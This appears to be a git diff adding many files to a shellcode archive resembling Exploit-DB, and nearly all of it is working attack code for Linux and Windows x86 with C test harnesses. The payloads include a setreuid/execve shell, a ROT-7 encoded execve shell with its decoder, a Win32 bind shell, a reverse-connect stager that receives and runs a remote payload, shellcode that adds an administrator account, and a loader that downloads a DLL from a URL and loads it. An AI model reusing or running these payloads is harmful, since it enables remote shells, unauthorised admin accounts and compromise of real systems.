# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
/*
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Shellcode Linux x86 Run /usr/bin/python | setreuid(),execve()
Shellcode Length: 54
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: b0 46 mov $0x46,%al
4: 31 db xor %ebx,%ebx
6: 31 c9 xor %ecx,%ecx
8: cd 80 int $0x80
a: eb 16 jmp 22 <last>
0000000c <first>:
c: 5b pop %ebx
d: 31 c0 xor %eax,%eax
f: 88 43 0f mov %al,0xf(%ebx)
12: 89 5b 10 mov %ebx,0x10(%ebx)
15: 89 43 14 mov %eax,0x14(%ebx)
18: b0 0b mov $0xb,%al
1a: 8d 4b 10 lea 0x10(%ebx),%ecx
1d: 8d 53 14 lea 0x14(%ebx),%edx
20: cd 80 int $0x80
00000022 <last>:
22: e8 e5 ff ff ff call c <first>
27: 2f das
28: 75 73 jne 9d <last+0x7b>
2a: 72 2f jb 5b <last+0x39>
2c: 62 69 6e bound %ebp,0x6e(%ecx)
2f: 2f das
30: 70 79 jo ab <last+0x89>
32: 74 68 je 9c <last+0x7a>
34: 6f outsl %ds:(%esi),(%dx)
35: 6e outsb %ds:(%esi),(%dx)
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x0f\x89\x5b\x10\x89\x43\x14\xb0\x0b\x8d\x4b\x10\x8d\x53\x14\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}

133
shellcodes/linux_x86/43758.txt Normal file
View file

@ -0,0 +1,133 @@
/*
ROT-7 Decoder Shellcode - Linux Intel/x86
Author: Stavros Metzidakis
*/
a) Python ROT-7 encoder for shellcode (execve-stack)
---------------------------------------------------------------------------------------
#!/usr/bin/python
# Python ROT-7 Encoder
shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
# boundary is computed as 255-ROT(x) where x, the amount to rotate by
if x > 248:
encoded += '\\x'
encoded += '%02x' %(7 -(256 - x))
encoded2 += '0x'
encoded2 += '%02x,' %(7 -(256 - x))
else:
encoded += '\\x'
encoded += '%02x'%(x+7)
encoded2 += '0x'
encoded2 += '%02x,' %(x+7)
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
---------------------------------------------------------------------------------------
Test run:
$ ./rot-7-encoder.py
Encoded shellcode ...
\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87
0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87,
Len: 30
b) Decoder for a ROT-7 encoded shellcode (execve-stack)
---------------------------------------------------------------------------------------
$objdump -d rot-7-decoder -M intel
rot-7-decoder: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 25 jmp 8048087 <call_decoder>
08048062 <decoder>:
8048062: 5e pop esi
8048063: 31 c9 xor ecx,ecx
8048065: b1 1e mov cl,0x1e ;ROTed shellcode length goes here
08048067 <decode>:
8048067: 80 3e 07 cmp BYTE PTR [esi],0x7
804806a: 7c 05 jl 8048071 <lowbound>
804806c: 80 2e 07 sub BYTE PTR [esi],0x7
804806f: eb 11 jmp 8048082 <common_commands>
08048071 <lowbound>:
8048071: 31 db xor ebx,ebx
8048073: 31 d2 xor edx,edx
8048075: b3 07 mov bl,0x7
8048077: b2 ff mov dl,0xff
8048079: 66 42 inc dx
804807b: 2a 1e sub bl,BYTE PTR [esi]
804807d: 66 29 da sub dx,bx
8048080: 88 16 mov BYTE PTR [esi],dl
08048082 <common_commands>:
8048082: 46 inc esi
8048083: e2 e2 loop 8048067 <decode>
8048085: eb 05 jmp 804808c <Shellcode>
08048087 <call_decoder>:
8048087: e8 d6 ff ff ff call 8048062 <decoder>
0804808c <Shellcode>: ;ROTed shellcode
804808c: 38 c7 cmp bh,al
804808e: 57 push edi
804808f: 6f outs dx,DWORD PTR ds:[esi]
8048090: 69 68 7a 6f 6f 69 70 imul ebp,DWORD PTR [eax+0x7a],0x70696f6f
8048097: 75 36 jne 80480cf <Shellcode+0x43>
8048099: 6f outs dx,DWORD PTR ds:[esi]
804809a: 36 ss
804809b: 36 ss
804809c: 36 ss
804809d: 36 ss
804809e: 90 nop
804809f: ea 57 90 e9 5a 90 e8 jmp 0xe890:0x5ae99057
80480a6: b7 12 mov bh,0x12
80480a8: d4 87 aam 0x87
---------------------------------------------------------------------------------------
$ cat shellcode.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = "\xeb\x25\x5e\x31\xc9\xb1\x1e\x80\x3e\x07\x7c\x05\x80\x2e\x07\xeb\x11\x31\xdb\x31\xd2\xb3\x07\xb2\xff\x66\x42\x2a\x1e\x66\x29\xda\x88\x16\x46\xe2\xe2\xeb\x05\xe8\xd6\xff\xff\xff\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
$ gcc ./shellcode.c -fno-stack-protector -z execstack -o shellcode
$ ./shellcode
Shellcode Length: 74
$

239
shellcodes/windows_x86/43759.asm Normal file
View file

@ -0,0 +1,239 @@
; Title: Win32 Bind Shell
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Function: Listen for connection and spawn command shell
; Author: hdm[at]metasploit.com
; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm
[BITS 32]
global _start
_start:
LCaller:
call LLoadFunctions
LDataSegment:
;========================
dd "CMD"
dd 0x79c679e7 ; closesocket 12
dd 0x498649e5 ; accept 16
dd 0xe92eada4 ; listen 20
dd 0xc7701aa4 ; bind 24
dd 0xadf509d9 ; WSASocketA 28
dd 0x3bfcedcb ; WSAStartup 32
dd 0xec0e4e8e ; LoadLibraryA 36
dd 0x73e2d87e ; ExitProcess 40
dd 0xce05d9ad ; WaitForSingleObject 44
dd 0x16b3fe72 ; CreateProcessA 48
db "WS2_32.DLL", 0x00, 0x01
;========================
LLoadFunctions:
pop ebx
push esp
mov ebp, esp
mov [ebp], ebx
LKernel32Base:
push byte 0x30
pop ecx
mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebx, [eax + 0x08]
jmp short LStartLoading
LLoadWinsock:
lea edx, [edi + 44] ; get address of ws2_32.dll
push ecx ; save counter
push edx ; push address of ws2_32.dll
call eax ; LoadLibraryA()
mov ebx, eax ; save module handle
pop ecx ; restore counter
jmp short Looper2
LStartLoading:
; Start loading addresses at ebp + 12
push byte 0x08
pop esi
add esi, ebp
; Function counter
push byte 0x0a
pop ecx
mov edi, [ebp]
Looper:
cmp cl, 0x06
je short LLoadWinsock
Looper2:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx*4] ; function hash value
call LGetProcAddress ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
xor edi, edi
LWSAStartup:
; WSAStartup(0x101, DATA)
sub sp, 400
push esp
push 0x101
call [ebp + 32]
LWSASocketA:
; WSASocketA(2,1,0,0,0,0)
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call [ebp + 28]
mov ebx, eax ; save socket to ebx
xor edi, edi
LBind:
push edi
push edi
push dword 0x11220002 ; port 8721
mov esi, esp
push byte 0x10 ; length
push esi
push ebx
call [ebp + 24]
LListen:
push edi
push ebx
call [ebp + 20]
LAccept:
push edi
push esi
push ebx
call [ebp + 16]
mov edx, eax
LCreateProcessStructs:
; allocate space for STARTUPINFO, PROCESS_INFORMATION
sub sp, 0x54
; zero out SI/PI
lea edi, [esp]
xor eax, eax
push byte 21
pop ecx
LBZero:
rep stosd
mov edi, edx
mov byte [esp + 16], 68 ; si.cb = sizeof(si)
inc byte [esp + 61] ; si.dwFlags = 0x100
; socket handles
mov [esp + 16 + 56], edi
mov [esp + 16 + 60], edi
mov [esp + 16 + 64], edi
lea eax, [esp + 16] ; si
push esp ; pi
push eax
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push dword [ebp]
push ecx
LCreateProcess:
call [ebp + 48]
mov ecx, esp
LWaitForSingleObject:
push 0xFFFFFFFF
push dword [ecx]
call [ebp + 44]
LCloseSocket:
push edi
call [ebp + 12]
LFinished:
call [ebp + 40]
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 8

135
shellcodes/windows_x86/43760.asm Normal file
View file

@ -0,0 +1,135 @@
; Title: Windows 2000 Vampiric Import Reverse Connect
; Platforms: Windows 2000
; Function: Attach to dbmssocn.dll, use IAT to connect, read/exec payload
; Author: hdm[at]metasploit.com
; Compile: nasm -f bin -o win2000_vampiric_connector.bin win2000_vampiric_connector.asm
[BITS 32]
%define ESIMOD add si, 0x3000
%define DBMSSOCN_WSAStartup [esi + 0x6C]
%define DBMSSOCN_connect [esi + 0x4C]
%define DBMSSOCN_recv [esi + 0x54]
%define DBMSSOCN_send [esi + 0x5C]
%define DBMSSOCN_socket [esi + 0x74]
; uncomment this for better error handling and persistent reconnects
; %define NICE
global _start
_start:
LKernel32Base:
push byte 0x30
pop ecx
mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebp, [eax + 0x08]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFinderLoop:
%ifdef NICE
jecxz LNotFound
%endif
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHasher:
xor eax, eax
lodsb
cmp al, ah
je short LFound
ror edi, 13
add edi, eax
jmp short LHasher
LFound:
cmp edi, 0xec0e4e8e ; LoadLibraryA
jnz short LFinderLoop
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LFinderDone
%ifdef NICE
LNotFound:
xor eax, eax
%endif
LFinderDone:
call LoadDBMSSOCN
LDataSegment:
;========================
db "DBMSSOCN.DLL"
db 0x00, 0xFF ; second byte only added for easy disasm
;========================
LoadDBMSSOCN:
call eax ; LoadLibraryA (ptr to dll on stack)
mov esi, eax ; esi used by all DBMSSOCN functions
ESIMOD ; inc base to save space on the calls
xor edi, edi ; edi is just a null
LWSAStartup:
sub sp, 400
push esp
push dword 0x101
call DBMSSOCN_WSAStartup
LSocket:
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call DBMSSOCN_socket
mov ebx, eax
LConnect:
push 0xF700A8C0 ; host: 192.168.0.247
push 0x11220002 ; port: 8721
mov ecx, esp
push byte 0x10
push ecx
push ebx
call DBMSSOCN_connect ; set eax to 0 on success
%ifdef NICE
test eax,eax
jnz LConnect
xor eax, eax
%endif
LReadCodeFromSocket:
add di, 0xffe ; read 4096 bytes of payload (edi == 2)
sub esp, edi
mov ebp, esp
push eax ; flags
push edi ; length
push ebp ; buffer
push ebx ; socket
call DBMSSOCN_recv ; recv(socket, buffer, length, flags)
jmp esp ; jump into new payload

200
shellcodes/windows_x86/43761.asm Normal file
View file

@ -0,0 +1,200 @@
; Title: Win32Create Admin User Account
; Platforms: Windows NT 4.0, Windows 2000, Windows XP
; Function: NetUserAdd(X); NetLocalGroupAddMembers(X, Administrators);
; Author: hdm[at]metasploit.com
[BITS 32]
global _start
_start:
sub sp, 128
mov esi, esp
; [esi]
; 00 kernel32.dll
; 04 netapi32.dll
; 08 LoadLibraryA
; 12 ExitProcess
; 16 NetUserAdd
; 20 NetLocalGroupAddMembers
; 24 user/pass
; 28 group
; get base kernel32 address
call LK32Base
mov [esi], eax
mov ebx, eax
; GetProcAddress(ExitProcess)
push ebx
push 0x73e2d87e
call LGetProcAddress
mov [esi + 12], eax
; GetProcAddress(LoadLibraryA)
push ebx
push 0xec0e4e8e
call LGetProcAddress
mov [esi + 8], eax
; LoadLibrary(netapi32.dll)
xor ebx, ebx
push ebx
push 0x32336970
push 0x6174656e
push esp
call eax
mov [esi + 4], eax
mov ebx, eax
; GetProcAddress(NetUserAdd)
push ebx
push 0xcd7cdf5e
call LGetProcAddress
mov [esi + 16], eax
; GetProcAddress(NetLocalGroupAddMembers)
push ebx
push 0xc30c3dd7
call LGetProcAddress
mov [esi + 20], eax
; useful register values
xor eax, eax
xor ebx, ebx
inc ebx
; push the group (Administrators)
push eax
push 0x00730072
push 0x006f0074
push 0x00610072
push 0x00740073
push 0x0069006e
push 0x0069006d
push 0x00640041
mov [esi + 28], esp
; push the username (X)
push eax
push 0x00000058
mov ecx, esp
mov [esi + 24], ecx
; add the \ to the username
push 0x005c0000
; create the NetUserAdd arguments
push eax
push ebx
push eax
push eax
push ebx
push eax
push ecx
push ecx
mov ecx, esp
push eax
push esp
push ecx
push ebx
push eax
; call NetUserAdd(X)
call [esi + 16]
; create the NetLocalGroupAddMembers arguments
mov ecx, [esi + 24]
dec ecx
dec ecx
push ecx
mov ecx, esp
push byte 1
push ecx
push byte 3
push dword [esi + 28]
push byte 0
; call NetLocalGroupAddMembers
call [esi + 20]
LFinished:
call [esi + 12]
LK32Base:
push esi
push byte 0x30
pop ecx
mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov eax, [eax + 0x08]
pop esi
ret 4
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 8

22
shellcodes/windows_x86/43762.c Normal file
View file

@ -0,0 +1,22 @@
/*
win32/xp sp3 (FR) Sleep 14 bytes
Author : optix hacker <aidi youssef>
Mail : optix@9.cn
notice Tested Under Windows XP SP3 (fr)
this shellcode makes a sleep for 90000ms=90s=1,5min
this is API from kernel32.dll for sleep :0x7C802446 in win32 xp sp3 (fr)
assembly code is secret in this shellcode :)
*/
#include <stdio.h>
unsigned char shellcode[] ="\x31"
"\xC0\xB9\x46\x24\x80\x7C\x66\xB8\x90\x5F\x50\xFF\xD1";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

71
shellcodes/windows_x86/43763.txt Normal file
View file

@ -0,0 +1,71 @@
+-------------------------------------------------+
| Windows XP Pro Sp2 English "Wordpad" Shellcode. |
+-------------------------------------------------+
Size : 15 Bytes.
Author: Aodrulez.
Email : f3arm3d3ar@gmail.com
Shellcode = "\x6A\x05\x68\x97\x4C\x80\x7C\xB8"
"\x4D\x11\x86\x7C\xFF\xD0\xCC";
+-----------+
| Asm Code: |
+-----------+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
start:
push 5
push 7c804c97h ;addr of "write" string in mem
mov eax,7c86114dh ;addr of "WinExec" Function.
call eax
int 3h
end start
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+-----------------+
| Shellcodetest.c |
+-----------------+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
char code[] = "\x6A\x05\x68\x97\x4C"
"\x80\x7C\xB8\x4D\x11"
"\x86\x7C\xFF\xD0\xCC";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+-------------------+
| Greetz Fly Out To |
+-------------------+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] www.isacm.org.in
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

45
shellcodes/windows_x86/43764.c Normal file
View file

@ -0,0 +1,45 @@
/*
[+] win32/xp pro sp3 (calc) 57 bytes
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Discovered By: cr4wl3r
*/
#include <stdio.h>
#include <string.h>
int main() {
char shell[] = "\xb8\xff\xef\xff\xff\xf7\xd0\x2b\xe0\x55\x8b\xec"
"\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45"
"\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45"
"\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\x8d\x45"
"\xf8\x50\xbb\xc7\x93\xbf\x77\xff\xd3";
printf("Shellcode lenght %d\n", strlen(shell));
getchar();
((void (*)()) shell)();
return 0;
}

26
shellcodes/windows_x86/43765.c Normal file
View file

@ -0,0 +1,26 @@
/*
| Title: Windows Xp Pro SP3 Fr (calc.exe) Shellcode 31 Bytes
| Type: Shellcode
| Author: agix
| Platform: win32
*/
#include <stdio.h>
char shellcode[] =
"\xEB\x10" //jmp short 0x12
"\x5B" //pop ebx
"\x53" //push ebx
"\xBB\xAD\x23\x86\x7C" //mov ebx, 0x7c8623ad
"\xFF\xD3" //call ebx
"\xBB\xFA\xCA\x81\x7C" //mov ebx, 0x7c81cafa
"\xFF\xD3" //call ebx
"\xE8\xEB\xFF\xFF\xFF" //call dword 0x2
//db calc.exe
"\x63\x61\x6C\x63\x2E\x65\x78\x65";
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}

101
shellcodes/windows_x86/43766.asm Normal file
View file

@ -0,0 +1,101 @@
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.
BITS 32
; Windows x86 null-free shellcode that writes "Hello, world!" to stdout.
; Works in any console application for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
; This version uses 16-bit hashes.
%define url 'http://skypher.com/dll'
%strlen sizeof_url url
%include 'w32-dl-loadlib-shellcode-hash-list.asm'
%define B2W(b1,b2) (((b2) << 8) + (b1))
%define W2DW(w1,w2) (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
%define buffer_size 0x7C
%ifdef STACK_ALIGN
AND SP, 0xFFFC
%endif
MOV EDI, W2DW(hash_kernel32_LoadLibraryA, hash_urlmon_URLDownloadToCacheFileA)
find_hash: ; Find ntdll's InInitOrder list of modules:
PUSH EDI ; Stack = (hash, hash) [, &(url), &(LoadLibraryA)]
XOR ESI, ESI ; ESI = 0
MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30])
MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr
MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the current module and find the next module:
MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address
MOV ESI, [ESI] ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
MOV EBX, [EBP + 0x3C] ; EBX = &(PE header)
MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table)
ADD EBX, EBP ; EBX = &(export table)
MOV ECX, [EBX + 0x18] ; ECX = number of name pointers
JCXZ next_module ; No name pointers? Next module.
next_function_loop: ; Get the next function name for hashing:
MOV EDI, [EBX + 0x20] ; EDI = offset(names table)
ADD EDI, EBP ; EDI = &(names table)
MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name)
ADD EDI, EBP ; EDI = &(function name)
XOR EAX, EAX ; EAX = 0
CDQ ; EDX = 0
hash_loop: ; Hash the function name and compare with requested hash
XOR DL, [EDI]
ROR DX, BYTE hash_ror_value
SCASB
JNE hash_loop
CMP DX, [ESP]
LOOPNE next_function_loop ; Not the right hash and functions left in module? Next function
JNE next_module ; Not the right hash and no functions left in module? Next module
; Found the right hash: get the address of the function:
MOV EDX, [EBX + 0x24] ; ESI = offset ordinals table
ADD EDX, EBP ; ESI = &oridinals table
MOVZX EDX, WORD [EDX + 2 * ECX] ; ESI = ordinal number of function
MOV EDI, [EBX + 0x1C] ; EDI = offset address table
ADD EDI, EBP ; EDI = &address table
ADD EBP, [EDI + 4 * EDX] ; EBP = &(function)
; Move to the next hash, this sets ECX to 0 if there are no more hashes:
POP CX ; CX = hash | Stack = hash [, &(url), &(LoadLibraryA)]
POP CX ; CX = hash | Stack = [&(url), &(LoadLibraryA)]
MOV AH, 0x1 ; EAX = 0x100
JCXZ download_and_loadlibrary ; No more hashes
MOV EDI, ECX ; EDI = hashes
SUB ESP, EAX ; Stack = buffer (0x100 bytes)
PUSH AX ; Stack = (0, 1), buffer
PUSH B2DW('l', 'm', 'o', 'n') ; Stack = "lmon", (0, 1), buffer
PUSH WORD B2W('u', 'r') ; Stack = "urlmon", (0, 1), buffer
PUSH ESP ; Stack = &("urlmon"), "urlmon", (0, 1), buffer
CALL EBP ; LoadLibraryA("urlmon")
PUSH EBP ; Stack = &(LoadLibraryA), buffer
CALL find_hash ; Stack = &(url), &(LoadLibraryA), buffer
db url
download_and_loadlibrary: ; Stack = &(url), &(LoadLibraryA), buffer
POP ESI ; ESI = &(url) | Stack = &(LoadLibraryA), buffer
POP EDX ; EDX = &(LoadLibraryA) | Stack = buffer
; Copy url to stack and NULL terminate it:
MOV EDI, ESP ; EDI = &(buffer)
PUSH BYTE sizeof_url ;
POP ECX ; ECX = sizeof(url)
REP MOVSB ; Stack = url buffer | EDI = &(buffer)
STOSB ; Stack = url, 0, buffer | EDI = &(buffer)
MOV ESI, ESP ; ESI = &(url)
; Create a ret-into-libc stack chain to make URLDownloadToCacheFileA() return to LoadLibraryA():
; LoadLibraryA(
PUSH EDI ; __in LPCTSTR lpFileName = &(buffer)
PUSH ECX ; ) return address = NULL
; URLDownloadToCacheFileA(
PUSH ECX ; __in IBindStatusCallback *pBSC = NULL
PUSH ECX ; DWORD dwReserved = NULL
; Our buffer is not really 0x100 bytes long anymore because we used part of it to store the URL... oh well.
PUSH EAX ; __in DWORD cchFileName = sizeof(buffer)
PUSH EDI ; __out LPTSTR szFileName = &(buffer)
PUSH ESI ; __in LPCSTR szURL = &(url)
PUSH ECX ; __in LPUNKNOWN lpUnkcaller = NULL
PUSH EDX ; ) return address = LoadLibraryA
; Start the ret-into-libc chain:
JMP EBP ; Jump to URLDownloadToCacheFileA, then return to LoadLibraryA

63
shellcodes/windows_x86/43767.asm Normal file
View file

@ -0,0 +1,63 @@
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.
BITS 32
; Windows x86 null-free shellcode that executes calc.exe.
; Works in any application for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
; This version uses 16-bit hashes.
%include 'w32-exec-calc-shellcode-hash-list.asm'
%define B2W(b1,b2) (((b2) << 8) + (b1))
%define W2DW(w1,w2) (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
%ifdef STACK_ALIGN
AND SP, 0xFFFC
%endif
find_hash: ; Find ntdll's InInitOrder list of modules:
XOR ESI, ESI ; ESI = 0
PUSH ESI ; Stack = 0
MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30])
MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr
MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the current module and find the next module:
MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address
MOV ESI, [ESI] ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
MOV EBX, [EBP + 0x3C] ; EBX = &(PE header)
MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table)
ADD EBX, EBP ; EBX = &(export table)
MOV ECX, [EBX + 0x18] ; ECX = number of name pointers
JCXZ next_module ; No name pointers? Next module.
next_function_loop: ; Get the next function name for hashing:
MOV EDI, [EBX + 0x20] ; EDI = offset(names table)
ADD EDI, EBP ; EDI = &(names table)
MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name)
ADD EDI, EBP ; EDI = &(function name)
XOR EAX, EAX ; EAX = 0
CDQ ; EDX = 0
hash_loop: ; Hash the function name and compare with requested hash
XOR DL, [EDI]
ROR DX, BYTE hash_ror_value
SCASB
JNE hash_loop
CMP DX, hash_kernel32_WinExec
LOOPNE next_function_loop ; Not the right hash and functions left in module? Next function
JNE next_module ; Not the right hash and no functions left in module? Next module
; Found the right hash: get the address of the function:
MOV EDX, [EBX + 0x24] ; ESI = offset ordinals table
ADD EDX, EBP ; ESI = &oridinals table
MOVZX EDX, WORD [EDX + 2 * ECX] ; ESI = ordinal number of function
MOV EDI, [EBX + 0x1C] ; EDI = offset address table
ADD EDI, EBP ; EDI = &address table
ADD EBP, [EDI + 4 * EDX] ; EBP = &(function)
; create the calc.exe string
PUSH B2DW('.', 'e', 'x', 'e') ; Stack = ".exe", 0
PUSH B2DW('c', 'a', 'l', 'c') ; Stack = "calc.exe", 0
PUSH ESP ; Stack = &("calc.exe"), "calc.exe", 0
XCHG EAX, [ESP] ; Stack = 0, "calc.exe", 0
PUSH EAX ; Stack = &("calc.exe"), 0, "calc.exe", 0
CALL EBP ; WinExec(&("calc.exe"), 0);
INT3 ; Crash

81
shellcodes/windows_x86/43768.asm Normal file
View file

@ -0,0 +1,81 @@
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.
BITS 32
; Windows x86 null-free shellcode that executes calc.exe.
; Works in any application for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
; This version uses 16-bit hashes.
%include 'w32-msgbox-shellcode-hash-list.asm'
